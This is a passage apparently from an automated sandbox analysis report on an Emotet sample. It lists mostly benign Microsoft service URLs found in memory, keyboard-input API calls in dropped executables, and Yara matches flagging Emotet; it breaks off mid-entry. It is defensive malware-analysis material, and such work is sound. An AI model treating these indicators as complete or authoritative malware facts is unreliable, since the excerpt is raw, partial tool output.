Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://graph.ppe.windows.net
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://graph.ppe.windows.net/
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://graph.windows.net
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://graph.windows.net/
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://incidents.diagnostics.office.com
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://lifecycle.office.com
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://login.microsoftonline.com/
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://login.microsoftonline.com/common
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://login.windows.local
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://management.azure.com
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://management.azure.com/
Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.dr | String found in binary or memory: https://messaging.office.com/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://ncus-000.contentsync.
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://officeapps.live.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://onedrive.live.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://onedrive.live.com/embed?
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://powerlift.acompli.net
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://retailer.osi.office.net/appstate/query
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://settings.outlook.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://shell.suite.office.com:1443
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://store.office.com/addinstemplate
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://store.office.de/addinstemplate
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: svchost.exe, 0000000D.00000002.303932710.000002041B63D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 0000000D.00000002.303900237.000002041B613000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.303932710.000002041B63D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000D.00000003.281922391.000002041B632000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000D.00000003.303748258.000002041B645000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000D.00000003.281922391.000002041B632000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 0000000D.00000003.281922391.000002041B632000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 0000000D.00000003.303677764.000002041B649000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://tasks.office.com
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://templatelogging.office.com/client/log
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://wus2-000.contentsync.
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                Source: svchost.exe, 0000000A.00000002.472449921.000002A34EE14000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: 0D03CAF8-CE4F-42ED-AB64-BD88932B865F.0.drString found in binary or memory: https://www.odwebp.svc.ms
                Source: C:\Users\user\Yg9k_9t\oad70dS\Xagna69y8.exeCode function: 4_2_00402A80 MapVirtualKeyA,GetVersion,keybd_event,Sleep,keybd_event,keybd_event,SendInput,GetKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyA,Sleep,4_2_00402A80
                Source: C:\Users\user\Yg9k_9t\oad70dS\Xagna69y8.exeCode function: 4_2_00412B8C GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,4_2_00412B8C
                Source: C:\Windows\SysWOW64\iedkcs32\RTMediaFrame.exeCode function: 5_2_00412B8C GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,5_2_00412B8C

                E-Banking Fraud:

                Yara detected Emotet
                Source: Yara match | File source: 00000005.00000002.470373056.0000000000600000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.220109967.00000000006D1000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.471107407.00000000021B4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match